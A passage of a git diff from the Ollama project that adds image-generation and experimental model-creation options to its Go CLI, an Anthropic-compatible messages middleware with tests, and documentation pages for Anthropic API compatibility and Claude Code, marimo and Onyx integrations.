modelDir = cmd.Args
case "template":
mfConfig.Template = cmd.Args
case "system":
mfConfig.System = cmd.Args
case "license":
mfConfig.License = cmd.Args
}
}
if modelDir == "" {
modelDir = "."
}
// Resolve relative paths based on Modelfile location
if !filepath.IsAbs(modelDir) && filename != "" {
modelDir = filepath.Join(filepath.Dir(filename), modelDir)
}
quantize, _ := cmd.Flags().GetString("quantize")
return xcreateclient.CreateModel(xcreateclient.CreateOptions{
ModelName: modelName,
ModelDir: modelDir,
Quantize: quantize,
Modelfile: mfConfig,
}, p)
}
var reader io.Reader
filename, err := getModelfileName(cmd)
if os.IsNotExist(err) {
if filename == "" {
// No Modelfile found - check if current directory is an image gen model
if create.IsTensorModelDir(".") {
quantize, _ := cmd.Flags().GetString("quantize")
return xcreateclient.CreateModel(xcreateclient.CreateOptions{
ModelName: modelName,
ModelDir: ".",
Quantize: quantize,
}, p)
}
reader = strings.NewReader("FROM .\n")
} else {
return errModelfileNotFound
@@ -127,7 +207,7 @@ func CreateHandler(cmd *cobra.Command, args []string) error {
}
spinner.Stop()
req.Model = args[0]
req.Model = modelName
quantize, _ := cmd.Flags().GetString("quantize")
if quantize != "" {
req.Quantize = quantize
@@ -457,6 +537,7 @@ func RunHandler(cmd *cobra.Command, args []string) error {
}
name := args[0]
info, err := func() (*api.ShowResponse, error) {
showReq := &api.ShowRequest{Name: name}
info, err := client.Show(cmd.Context(), showReq)
@@ -518,9 +599,18 @@ func RunHandler(cmd *cobra.Command, args []string) error {
return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
}
// Check if this is an image generation model
if slices.Contains(info.Capabilities, model.CapabilityImageGeneration) {
if opts.Prompt == "" && !interactive {
return errors.New("image generation models require a prompt. Usage: ollama run " + name + " \"your prompt here\"")
}
return imagegen.RunCLI(cmd, name, opts.Prompt, interactive, opts.KeepAlive)
}
// Check for experimental flag
isExperimental, _ := cmd.Flags().GetBool("experimental")
yoloMode, _ := cmd.Flags().GetBool("yolo")
yoloMode, _ := cmd.Flags().GetBool("experimental-yolo")
enableWebsearch, _ := cmd.Flags().GetBool("experimental-websearch")
if interactive {
if err := loadOrUnloadModel(cmd, &opts); err != nil {
@@ -550,7 +640,7 @@ func RunHandler(cmd *cobra.Command, args []string) error {
// Use experimental agent loop with tools
if isExperimental {
return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode)
return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive, yoloMode, enableWebsearch)
}
return generateInteractive(cmd, opts)
@@ -656,7 +746,11 @@ func PushHandler(cmd *cobra.Command, args []string) error {
bar, ok := bars[resp.Digest]
if !ok {
bar = progress.NewBar(fmt.Sprintf("pushing %s...", resp.Digest[7:19]), resp.Total, resp.Completed)
msg := resp.Status
if msg == "" {
msg = fmt.Sprintf("pushing %s...", resp.Digest[7:19])
}
bar = progress.NewBar(msg, resp.Total, resp.Completed)
bars[resp.Digest] = bar
p.Add(resp.Digest, bar)
}
@@ -1721,15 +1815,22 @@ func NewCLI() *cobra.Command {
rootCmd.Flags().BoolP("version", "v", false, "Show version information")
createCmd := &cobra.Command{
Use: "create MODEL",
Short: "Create a model",
Args: cobra.ExactArgs(1),
PreRunE: checkServerHeartbeat,
RunE: CreateHandler,
Use: "create MODEL",
Short: "Create a model",
Args: cobra.ExactArgs(1),
PreRunE: func(cmd *cobra.Command, args []string) error {
// Skip server check for experimental mode (writes directly to disk)
if experimental, _ := cmd.Flags().GetBool("experimental"); experimental {
return nil
}
return checkServerHeartbeat(cmd, args)
},
RunE: CreateHandler,
}
createCmd.Flags().StringP("file", "f", "", "Name of the Modelfile (default \"Modelfile\")")
createCmd.Flags().StringP("quantize", "q", "", "Quantize model to this level (e.g. q4_K_M)")
createCmd.Flags().Bool("experimental", false, "Enable experimental safetensors model creation")
showCmd := &cobra.Command{
Use: "show MODEL",
@@ -1765,7 +1866,11 @@ func NewCLI() *cobra.Command {
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
runCmd.Flags().BoolP("yolo", "y", false, "Skip all tool approval prompts (use with caution)")
runCmd.Flags().Bool("experimental-yolo", false, "Skip all tool approval prompts (use with caution)")
runCmd.Flags().Bool("experimental-websearch", false, "Enable web search tool in experimental mode")
// Image generation flags (width, height, steps, seed, etc.)
imagegen.RegisterFlags(runCmd)
stopCmd := &cobra.Command{
Use: "stop MODEL",

View File

@@ -1547,6 +1547,79 @@ func TestRunOptions_Copy_ThinkValueVariants(t *testing.T) {
}
}
func TestShowInfoImageGen(t *testing.T) {
var b bytes.Buffer
err := showInfo(&api.ShowResponse{
Details: api.ModelDetails{
Family: "ZImagePipeline",
ParameterSize: "10.3B",
QuantizationLevel: "FP8",
},
Capabilities: []model.Capability{model.CapabilityImageGeneration},
Requires: "0.14.0",
}, false, &b)
if err != nil {
t.Fatal(err)
}
expect := " Model\n" +
" architecture ZImagePipeline \n" +
" parameters 10.3B \n" +
" quantization FP8 \n" +
" requires 0.14.0 \n" +
"\n" +
" Capabilities\n" +
" image \n" +
"\n"
if diff := cmp.Diff(expect, b.String()); diff != "" {
t.Errorf("unexpected output (-want +got):\n%s", diff)
}
}
func TestPushProgressMessage(t *testing.T) {
tests := []struct {
name string
status string
digest string
wantMsg string
}{
{
name: "uses status when provided",
status: "uploading model",
digest: "sha256:abc123456789def",
wantMsg: "uploading model",
},
{
name: "falls back to digest when status empty",
status: "",
digest: "sha256:abc123456789def",
wantMsg: "pushing abc123456789...",
},
{
name: "handles short digest gracefully",
status: "",
digest: "sha256:abc",
wantMsg: "pushing sha256:abc...",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
msg := tt.status
if msg == "" {
if len(tt.digest) >= 19 {
msg = fmt.Sprintf("pushing %s...", tt.digest[7:19])
} else {
msg = fmt.Sprintf("pushing %s...", tt.digest)
}
}
if msg != tt.wantMsg {
t.Errorf("got %q, want %q", msg, tt.wantMsg)
}
})
}
}
func TestRunOptions_Copy_Independence(t *testing.T) {
// Test that modifications to original don't affect copy
originalThink := &api.ThinkValue{Value: "original"}

View File

@@ -116,7 +116,7 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
Prompt: ">>> ",
AltPrompt: "... ",
Placeholder: "Send a message (/? for help)",
AltPlaceholder: `Use """ to end multi-line input`,
AltPlaceholder: "Press Enter to send",
})
if err != nil {
return err

View File

@@ -14,6 +14,7 @@
* [API Reference](https://docs.ollama.com/api)
* [Modelfile Reference](https://docs.ollama.com/modelfile)
* [OpenAI Compatibility](https://docs.ollama.com/api/openai-compatibility)
* [Anthropic Compatibility](./api/anthropic-compatibility.mdx)
### Resources

View File

@@ -16,6 +16,7 @@
- [Generate Embeddings](#generate-embeddings)
- [List Running Models](#list-running-models)
- [Version](#version)
- [Experimental: Generate an image](#generate-an-image-experimental)
## Conventions
@@ -1867,3 +1868,85 @@ curl http://localhost:11434/api/version
"version": "0.5.1"
}
```
## Experimental Endpoints
### Generate an image (Experimental)
```
POST /x/generate
```
> [!WARNING]
> This endpoint is experimental and may change in future versions.
Generate an image using an image generation model. This endpoint is specifically designed for diffusion-based image generation models.
#### Parameters
- `model`: (required) the [model name](#model-names) of an image generation model
- `prompt`: the text prompt describing the image to generate
Image generation parameters (optional):
- `width`: width of the generated image in pixels (default: model-specific, typically 1024)
- `height`: height of the generated image in pixels (default: model-specific, typically 1024)
- `steps`: number of diffusion steps (default: model-specific)
Other parameters:
- `keep_alive`: controls how long the model will stay loaded into memory following the request (default: `5m`)
#### Response
The response is streamed as JSON objects showing generation progress:
- `status`: describes the current phase (e.g., "generating image")
- `total`: total number of steps
- `completed`: number of completed steps
- `done`: whether generation is complete
The final response includes:
- `images`: array of base64-encoded generated images
- `total_duration`: time spent generating the image
- `load_duration`: time spent loading the model
#### Examples
##### Request
```shell
curl http://localhost:11434/x/generate -d '{
"model": "flux",
"prompt": "a sunset over mountains",
"width": 1024,
"height": 768
}'
```
##### Response (streaming)
```json
{
"model": "flux",
"created_at": "2024-01-15T10:30:00.000000Z",
"status": "generating image",
"completed": 5,
"total": 20,
"done": false
}
```
##### Final Response
```json
{
"model": "flux",
"created_at": "2024-01-15T10:30:15.000000Z",
"images": ["iVBORw0KGgoAAAANSUhEUg..."],
"done": true,
"total_duration": 15000000000,
"load_duration": 2000000000
}
```

View File

@@ -0,0 +1,408 @@
---
title: Anthropic compatibility
---
Ollama provides compatibility with the [Anthropic Messages API](https://docs.anthropic.com/en/api/messages) to help connect existing applications to Ollama, including tools like Claude Code.
## Recommended models
For coding use cases, models like `glm-4.7:cloud`, `minimax-m2.1:cloud`, and `qwen3-coder` are recommended.
Pull a model before use:
```shell
ollama pull qwen3-coder
ollama pull glm-4.7:cloud
```
## Usage
### Environment variables
To use Ollama with tools that expect the Anthropic API (like Claude Code), set these environment variables:
```shell
export ANTHROPIC_AUTH_TOKEN=ollama # required but ignored
export ANTHROPIC_BASE_URL=http://localhost:11434
export ANTHROPIC_API_KEY=ollama # required but ignored
```
### Simple `/v1/messages` example
<CodeGroup dropdown>
```python basic.py
import anthropic
client = anthropic.Anthropic(
base_url='http://localhost:11434',
api_key='ollama', # required but ignored
)
message = client.messages.create(
model='qwen3-coder',
max_tokens=1024,
messages=[
{'role': 'user', 'content': 'Hello, how are you?'}
]
)
print(message.content[0].text)
```
```javascript basic.js
import Anthropic from "@anthropic-ai/sdk";
const anthropic = new Anthropic({
baseURL: "http://localhost:11434",
apiKey: "ollama", // required but ignored
});
const message = await anthropic.messages.create({
model: "qwen3-coder",
max_tokens: 1024,
messages: [{ role: "user", content: "Hello, how are you?" }],
});
console.log(message.content[0].text);
```
```shell basic.sh
curl -X POST http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-H "x-api-key: ollama" \
-H "anthropic-version: 2023-06-01" \
-d '{
"model": "qwen3-coder",
"max_tokens": 1024,
"messages": [{ "role": "user", "content": "Hello, how are you?" }]
}'
```
</CodeGroup>
### Streaming example
<CodeGroup dropdown>
```python streaming.py
import anthropic
client = anthropic.Anthropic(
base_url='http://localhost:11434',
api_key='ollama',
)
with client.messages.stream(
model='qwen3-coder',
max_tokens=1024,
messages=[{'role': 'user', 'content': 'Count from 1 to 10'}]
) as stream:
for text in stream.text_stream:
print(text, end='', flush=True)
```
```javascript streaming.js
import Anthropic from "@anthropic-ai/sdk";
const anthropic = new Anthropic({
baseURL: "http://localhost:11434",
apiKey: "ollama",
});
const stream = await anthropic.messages.stream({
model: "qwen3-coder",
max_tokens: 1024,
messages: [{ role: "user", content: "Count from 1 to 10" }],
});
for await (const event of stream) {
if (
event.type === "content_block_delta" &&
event.delta.type === "text_delta"
) {
process.stdout.write(event.delta.text);
}
}
```
```shell streaming.sh
curl -X POST http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-d '{
"model": "qwen3-coder",
"max_tokens": 1024,
"stream": true,
"messages": [{ "role": "user", "content": "Count from 1 to 10" }]
}'
```
</CodeGroup>
### Tool calling example
<CodeGroup dropdown>
```python tools.py
import anthropic
client = anthropic.Anthropic(
base_url='http://localhost:11434',
api_key='ollama',
)
message = client.messages.create(
model='qwen3-coder',
max_tokens=1024,
tools=[
{
'name': 'get_weather',
'description': 'Get the current weather in a location',
'input_schema': {
'type': 'object',
'properties': {
'location': {
'type': 'string',
'description': 'The city and state, e.g. San Francisco, CA'
}
},
'required': ['location']
}
}
],
messages=[{'role': 'user', 'content': "What's the weather in San Francisco?"}]
)
for block in message.content:
if block.type == 'tool_use':
print(f'Tool: {block.name}')
print(f'Input: {block.input}')
```
```javascript tools.js
import Anthropic from "@anthropic-ai/sdk";
const anthropic = new Anthropic({
baseURL: "http://localhost:11434",
apiKey: "ollama",
});
const message = await anthropic.messages.create({
model: "qwen3-coder",
max_tokens: 1024,
tools: [
{
name: "get_weather",
description: "Get the current weather in a location",
input_schema: {
type: "object",
properties: {
location: {
type: "string",
description: "The city and state, e.g. San Francisco, CA",
},
},
required: ["location"],
},
},
],
messages: [{ role: "user", content: "What's the weather in San Francisco?" }],
});
for (const block of message.content) {
if (block.type === "tool_use") {
console.log("Tool:", block.name);
console.log("Input:", block.input);
}
}
```
```shell tools.sh
curl -X POST http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-d '{
"model": "qwen3-coder",
"max_tokens": 1024,
"tools": [
{
"name": "get_weather",
"description": "Get the current weather in a location",
"input_schema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "The city and state"
}
},
"required": ["location"]
}
}
],
"messages": [{ "role": "user", "content": "What is the weather in San Francisco?" }]
}'
```
</CodeGroup>
## Using with Claude Code
[Claude Code](https://code.claude.com/docs/en/overview) can be configured to use Ollama as its backend:
```shell
ANTHROPIC_AUTH_TOKEN=ollama ANTHROPIC_BASE_URL=http://localhost:11434 ANTHROPIC_API_KEY=ollama claude --model qwen3-coder
```
Or set the environment variables in your shell profile:
```shell
export ANTHROPIC_AUTH_TOKEN=ollama
export ANTHROPIC_BASE_URL=http://localhost:11434
export ANTHROPIC_API_KEY=ollama
```
Then run Claude Code with any Ollama model:
```shell
# Local models
claude --model qwen3-coder
claude --model gpt-oss:20b
# Cloud models
claude --model glm-4.7:cloud
claude --model minimax-m2.1:cloud
```
## Endpoints
### `/v1/messages`
#### Supported features
- [x] Messages
- [x] Streaming
- [x] System prompts
- [x] Multi-turn conversations
- [x] Vision (images)
- [x] Tools (function calling)
- [x] Tool results
- [x] Thinking/extended thinking
#### Supported request fields
- [x] `model`
- [x] `max_tokens`
- [x] `messages`
- [x] Text `content`
- [x] Image `content` (base64)
- [x] Array of content blocks
- [x] `tool_use` blocks
- [x] `tool_result` blocks
- [x] `thinking` blocks
- [x] `system` (string or array)
- [x] `stream`
- [x] `temperature`
- [x] `top_p`
- [x] `top_k`
- [x] `stop_sequences`
- [x] `tools`
- [x] `thinking`
- [ ] `tool_choice`
- [ ] `metadata`
#### Supported response fields
- [x] `id`
- [x] `type`
- [x] `role`
- [x] `model`
- [x] `content` (text, tool_use, thinking blocks)
- [x] `stop_reason` (end_turn, max_tokens, tool_use)
- [x] `usage` (input_tokens, output_tokens)
#### Streaming events
- [x] `message_start`
- [x] `content_block_start`
- [x] `content_block_delta` (text_delta, input_json_delta, thinking_delta)
- [x] `content_block_stop`
- [x] `message_delta`
- [x] `message_stop`
- [x] `ping`
- [x] `error`
## Models
Ollama supports both local and cloud models.
### Local models
Pull a local model before use:
```shell
ollama pull qwen3-coder
```
Recommended local models:
- `qwen3-coder` - Excellent for coding tasks
- `gpt-oss:20b` - Strong general-purpose model
### Cloud models
Cloud models are available immediately without pulling:
- `glm-4.7:cloud` - High-performance cloud model
- `minimax-m2.1:cloud` - Fast cloud model
### Default model names
For tooling that relies on default Anthropic model names such as `claude-3-5-sonnet`, use `ollama cp` to copy an existing model name:
```shell
ollama cp qwen3-coder claude-3-5-sonnet
```
Afterwards, this new model name can be specified in the `model` field:
```shell
curl http://localhost:11434/v1/messages \
-H "Content-Type: application/json" \
-d '{
"model": "claude-3-5-sonnet",
"max_tokens": 1024,
"messages": [
{
"role": "user",
"content": "Hello!"
}
]
}'
```
## Differences from the Anthropic API
### Behavior differences
- API key is accepted but not validated
- `anthropic-version` header is accepted but not used
- Token counts are approximations based on the underlying model's tokenizer
### Not supported
The following Anthropic API features are not currently supported:
| Feature | Description |
|---------|-------------|
| `/v1/messages/count_tokens` | Token counting endpoint |
| `tool_choice` | Forcing specific tool use or disabling tools |
| `metadata` | Request metadata (user_id) |
| Prompt caching | `cache_control` blocks for caching prefixes |
| Batches API | `/v1/messages/batches` for async batch processing |
| Citations | `citations` content blocks |
| PDF support | `document` content blocks with PDF files |
| Server-sent errors | `error` events during streaming (errors return HTTP status) |
### Partial support
| Feature | Status |
|---------|--------|
| Image content | Base64 images supported; URL images not supported |
| Extended thinking | Basic support; `budget_tokens` accepted but not enforced |

View File

@@ -110,7 +110,7 @@ More Ollama [Python example](https://github.com/ollama/ollama-python/blob/main/e
import { Ollama } from "ollama";
const client = new Ollama();
const results = await client.webSearch({ query: "what is ollama?" });
const results = await client.webSearch("what is ollama?");
console.log(JSON.stringify(results, null, 2));
```
@@ -213,7 +213,7 @@ models](https://ollama.com/models)\n\nAvailable for macOS, Windows, and Linux',
import { Ollama } from "ollama";
const client = new Ollama();
const fetchResult = await client.webFetch({ url: "https://ollama.com" });
const fetchResult = await client.webFetch("https://ollama.com");
console.log(JSON.stringify(fetchResult, null, 2));
```

View File

@@ -32,7 +32,9 @@
"codeblocks": "system"
},
"contextual": {
"options": ["copy"]
"options": [
"copy"
]
},
"navbar": {
"links": [
@@ -52,7 +54,9 @@
"display": "simple"
},
"examples": {
"languages": ["curl"]
"languages": [
"curl"
]
}
},
"redirects": [
@@ -97,6 +101,7 @@
{
"group": "Integrations",
"pages": [
"/integrations/claude-code",
"/integrations/vscode",
"/integrations/jetbrains",
"/integrations/codex",
@@ -106,7 +111,9 @@
"/integrations/zed",
"/integrations/roo-code",
"/integrations/n8n",
"/integrations/xcode"
"/integrations/xcode",
"/integrations/onyx",
"/integrations/marimo"
]
},
{
@@ -139,7 +146,8 @@
"/api/streaming",
"/api/usage",
"/api/errors",
"/api/openai-compatibility"
"/api/openai-compatibility",
"/api/anthropic-compatibility"
]
},
{

View File

@@ -22,7 +22,7 @@ Please refer to the [GPU docs](./gpu).
## How can I specify the context window size?
By default, Ollama uses a context window size of 2048 tokens.
By default, Ollama uses a context window size of 4096 tokens.
This can be overridden with the `OLLAMA_CONTEXT_LENGTH` environment variable. For example, to set the default context window to 8K, use:

View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 174 KiB

BIN
docs/images/marimo-chat.png Normal file
View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 80 KiB

View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 230 KiB

View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 178 KiB

View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 186 KiB

BIN
docs/images/onyx-login.png Normal file
View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 100 KiB

View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 306 KiB

View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 300 KiB

BIN
docs/images/onyx-query.png Normal file
View File

Binary file not shown.

After

Width:  |  Height:  |  Size: 211 KiB

View File

@@ -0,0 +1,70 @@
---
title: Claude Code
---
## Install
Install [Claude Code](https://code.claude.com/docs/en/overview):
<CodeGroup>
```shell macOS / Linux
curl -fsSL https://claude.ai/install.sh | bash
```
```powershell Windows
irm https://claude.ai/install.ps1 | iex
```
</CodeGroup>
## Usage with Ollama
Claude Code connects to Ollama using the Anthropic-compatible API.
1. Set the environment variables:
```shell
export ANTHROPIC_AUTH_TOKEN=ollama
export ANTHROPIC_BASE_URL=http://localhost:11434
export ANTHROPIC_API_KEY=ollama
```
2. Run Claude Code with an Ollama model:
```shell
claude --model qwen3-coder
```
Or run with environment variables inline:
```shell
ANTHROPIC_AUTH_TOKEN=ollama ANTHROPIC_BASE_URL=http://localhost:11434 ANTHROPIC_API_KEY=ollama claude --model qwen3-coder
```
## Connecting to ollama.com
1. Create an [API key](https://ollama.com/settings/keys) on ollama.com
2. Set the environment variables:
```shell
export ANTHROPIC_BASE_URL=https://ollama.com
export ANTHROPIC_API_KEY=<your-api-key>
```
3. Run Claude Code with a cloud model:
```shell
claude --model glm-4.7:cloud
```
## Recommended Models
### Cloud models
- `glm-4.7:cloud` - High-performance cloud model
- `minimax-m2.1:cloud` - Fast cloud model
- `qwen3-coder:480b` - Large coding model
### Local models
- `qwen3-coder` - Excellent for coding tasks
- `gpt-oss:20b` - Strong general-purpose model

View File

@@ -0,0 +1,73 @@
---
title: marimo
---
## Install
Install [marimo](https://marimo.io). You can use `pip` or `uv` for this. You
can also use `uv` to create a sandboxed environment for marimo by running:
```
uvx marimo edit --sandbox notebook.py
```
## Usage with Ollama
1. In marimo, go to the user settings and go to the AI tab. From here
you can find and configure Ollama as an AI provider. For local use you
would typically point the base url to `http://localhost:11434/v1`.
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/marimo-settings.png"
alt="Ollama settings in marimo"
width="50%"
/>
</div>
2. Once the AI provider is set up, you can turn on/off specific AI models you'd like to access.
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/marimo-models.png"
alt="Selecting an Ollama model"
width="50%"
/>
</div>
3. You can also add a model to the list of available models by scrolling to the bottom and using the UI there.
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/marimo-add-model.png"
alt="Adding a new Ollama model"
width="50%"
/>
</div>
4. Once configured, you can now use Ollama for AI chats in marimo.
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/marimo-chat.png"
alt="Configure code completion"
width="50%"
/>
</div>
4. Alternatively, you can now use Ollama for **inline code completion** in marimo. This can be configured in the "AI Features" tab.
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/marimo-code-completion.png"
alt="Configure code completion"
width="50%"
/>
</div>
## Connecting to ollama.com
1. Sign in to ollama cloud via `ollama signin`
2. In the ollama model settings add a model that ollama hosts, like `gpt-oss:120b`.
3. You can now refer to this model in marimo!

View File

@@ -0,0 +1,63 @@
---
title: Onyx
---
## Overview
[Onyx](http://onyx.app/) is a self-hostable Chat UI that integrates with all Ollama models. Features include:
- Creating custom Agents
- Web search
- Deep Research
- RAG over uploaded documents and connected apps
- Connectors to applications like Google Drive, Email, Slack, etc.
- MCP and OpenAPI Actions support
- Image generation
- User/Groups management, RBAC, SSO, etc.
Onyx can be deployed for single users or large organizations.
## Install Onyx
Deploy Onyx with the [quickstart guide](https://docs.onyx.app/deployment/getting_started/quickstart).
<Info>
Resourcing/scaling docs [here](https://docs.onyx.app/deployment/getting_started/resourcing).
</Info>
## Usage with Ollama
1. Login to your Onyx deployment (create an account first).
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/onyx-login.png"
alt="Onyx Login Page"
width="75%"
/>
</div>
2. In the set-up process select `Ollama` as the LLM provider.
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/onyx-ollama-llm.png"
alt="Onyx Set Up Form"
width="75%"
/>
</div>
3. Provide your **Ollama API URL** and select your models.
<Note>If you're running Onyx in Docker, to access your computer's local network use `http://host.docker.internal` instead of `http://127.0.0.1`.</Note>
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/onyx-ollama-form.png"
alt="Selecting Ollama Models"
width="75%"
/>
</div>
You can also easily connect up Onyx Cloud with the `Ollama Cloud` tab of the setup.
## Send your first query
<div style={{ display: 'flex', justifyContent: 'center' }}>
<img
src="/images/onyx-query.png"
alt="Onyx Query Example"
width="75%"
/>
</div>

View File

@@ -1,3 +0,0 @@
# Troubleshooting
For troubleshooting, see [https://docs.ollama.com/troubleshooting](https://docs.ollama.com/troubleshooting)

View File

@@ -131,7 +131,7 @@ func TestAPIToolCalling(t *testing.T) {
t.Errorf("unexpected tool called: got %q want %q", lastToolCall.Function.Name, "get_weather")
}
if _, ok := lastToolCall.Function.Arguments["location"]; !ok {
if _, ok := lastToolCall.Function.Arguments.Get("location"); !ok {
t.Errorf("expected tool arguments to include 'location', got: %s", lastToolCall.Function.Arguments.String())
}
case <-ctx.Done():

View File

@@ -1464,6 +1464,12 @@ type CompletionRequest struct {
// TopLogprobs specifies the number of most likely alternative tokens to return (0-20)
TopLogprobs int
// Image generation fields
Width int32 `json:"width,omitempty"`
Height int32 `json:"height,omitempty"`
Steps int32 `json:"steps,omitempty"`
Seed int64 `json:"seed,omitempty"`
}
// DoneReason represents the reason why a completion response is done
@@ -1512,6 +1518,15 @@ type CompletionResponse struct {
// Logprobs contains log probability information if requested
Logprobs []Logprob `json:"logprobs,omitempty"`
// Image contains base64-encoded image data for image generation
Image string `json:"image,omitempty"`
// Step is the current step in image generation
Step int `json:"step,omitempty"`
// TotalSteps is the total number of steps for image generation
TotalSteps int `json:"total_steps,omitempty"`
}
func (s *llmServer) Completion(ctx context.Context, req CompletionRequest, fn func(CompletionResponse)) error {

152
middleware/anthropic.go Normal file
View File

@@ -0,0 +1,152 @@
package middleware
import (
"bytes"
"encoding/json"
"fmt"
"io"
"net/http"
"github.com/gin-gonic/gin"
"github.com/ollama/ollama/anthropic"
"github.com/ollama/ollama/api"
)
// AnthropicWriter wraps the response writer to transform Ollama responses to Anthropic format
type AnthropicWriter struct {
BaseWriter
stream bool
id string
model string
converter *anthropic.StreamConverter
}
func (w *AnthropicWriter) writeError(data []byte) (int, error) {
var errData struct {
Error string `json:"error"`
}
if err := json.Unmarshal(data, &errData); err != nil {
return 0, err
}
w.ResponseWriter.Header().Set("Content-Type", "application/json")
err := json.NewEncoder(w.ResponseWriter).Encode(anthropic.NewError(w.ResponseWriter.Status(), errData.Error))
if err != nil {
return 0, err
}
return len(data), nil
}
func (w *AnthropicWriter) writeEvent(eventType string, data any) error {
d, err := json.Marshal(data)
if err != nil {
return err
}
_, err = w.ResponseWriter.Write([]byte(fmt.Sprintf("event: %s\ndata: %s\n\n", eventType, d)))
if err != nil {
return err
}
if f, ok := w.ResponseWriter.(http.Flusher); ok {
f.Flush()
}
return nil
}
func (w *AnthropicWriter) writeResponse(data []byte) (int, error) {
var chatResponse api.ChatResponse
err := json.Unmarshal(data, &chatResponse)
if err != nil {
return 0, err
}
if w.stream {
w.ResponseWriter.Header().Set("Content-Type", "text/event-stream")
events := w.converter.Process(chatResponse)
for _, event := range events {
if err := w.writeEvent(event.Event, event.Data); err != nil {
return 0, err
}
}
return len(data), nil
}
w.ResponseWriter.Header().Set("Content-Type", "application/json")
response := anthropic.ToMessagesResponse(w.id, chatResponse)
return len(data), json.NewEncoder(w.ResponseWriter).Encode(response)
}
func (w *AnthropicWriter) Write(data []byte) (int, error) {
code := w.ResponseWriter.Status()
if code != http.StatusOK {
return w.writeError(data)
}
return w.writeResponse(data)
}
// AnthropicMessagesMiddleware handles Anthropic Messages API requests
func AnthropicMessagesMiddleware() gin.HandlerFunc {
return func(c *gin.Context) {
var req anthropic.MessagesRequest
err := c.ShouldBindJSON(&req)
if err != nil {
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
return
}
if req.Model == "" {
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "model is required"))
return
}
if req.MaxTokens <= 0 {
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "max_tokens is required and must be positive"))
return
}
if len(req.Messages) == 0 {
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, "messages is required"))
return
}
chatReq, err := anthropic.FromMessagesRequest(req)
if err != nil {
c.AbortWithStatusJSON(http.StatusBadRequest, anthropic.NewError(http.StatusBadRequest, err.Error()))
return
}
// Set think to nil when being used with Anthropic API to connect to tools like claude code
c.Set("relax_thinking", true)
var b bytes.Buffer
if err := json.NewEncoder(&b).Encode(chatReq); err != nil {
c.AbortWithStatusJSON(http.StatusInternalServerError, anthropic.NewError(http.StatusInternalServerError, err.Error()))
return
}
c.Request.Body = io.NopCloser(&b)
messageID := anthropic.GenerateMessageID()
w := &AnthropicWriter{
BaseWriter: BaseWriter{ResponseWriter: c.Writer},
stream: req.Stream,
id: messageID,
model: req.Model,
converter: anthropic.NewStreamConverter(messageID, req.Model),
}
if req.Stream {
c.Writer.Header().Set("Content-Type", "text/event-stream")
c.Writer.Header().Set("Cache-Control", "no-cache")
c.Writer.Header().Set("Connection", "keep-alive")
}
c.Writer = w
c.Next()
}
}

View File

@@ -0,0 +1,607 @@
package middleware
import (
"bytes"
"encoding/json"
"io"
"net/http"
"net/http/httptest"
"strings"
"testing"
"github.com/gin-gonic/gin"
"github.com/google/go-cmp/cmp"
"github.com/google/go-cmp/cmp/cmpopts"
"github.com/ollama/ollama/anthropic"
"github.com/ollama/ollama/api"
)
func captureAnthropicRequest(capturedRequest any) gin.HandlerFunc {
return func(c *gin.Context) {
bodyBytes, _ := io.ReadAll(c.Request.Body)
c.Request.Body = io.NopCloser(bytes.NewReader(bodyBytes))
_ = json.Unmarshal(bodyBytes, capturedRequest)
c.Next()
}
}
// testProps creates ToolPropertiesMap from a map (convenience function for tests)
func testProps(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
func TestAnthropicMessagesMiddleware(t *testing.T) {
type testCase struct {
name string
body string
req api.ChatRequest
err anthropic.ErrorResponse
}
var capturedRequest *api.ChatRequest
stream := true
testCases := []testCase{
{
name: "basic message",
body: `{
"model": "test-model",
"max_tokens": 1024,
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "user", Content: "Hello"},
},
Options: map[string]any{"num_predict": 1024},
Stream: &False,
},
},
{
name: "with system prompt",
body: `{
"model": "test-model",
"max_tokens": 1024,
"system": "You are helpful.",
"messages": [
{"role": "user", "content": "Hello"}
]
}`,
req: api.ChatRequest{
Model: "test-model",
Messages: []api.Message{
{Role: "system", Content: "You are helpful."},
{Role: "user", Content: "Hello"},
},
Options: map[string]any{"num_predict": 1024},
Stream: &False,
},
},
{
name: "with options",
body: `{
"model": "test-model",
"max_tokens": 2048,
"temperature": 0.7,
"top_p": 0.9,
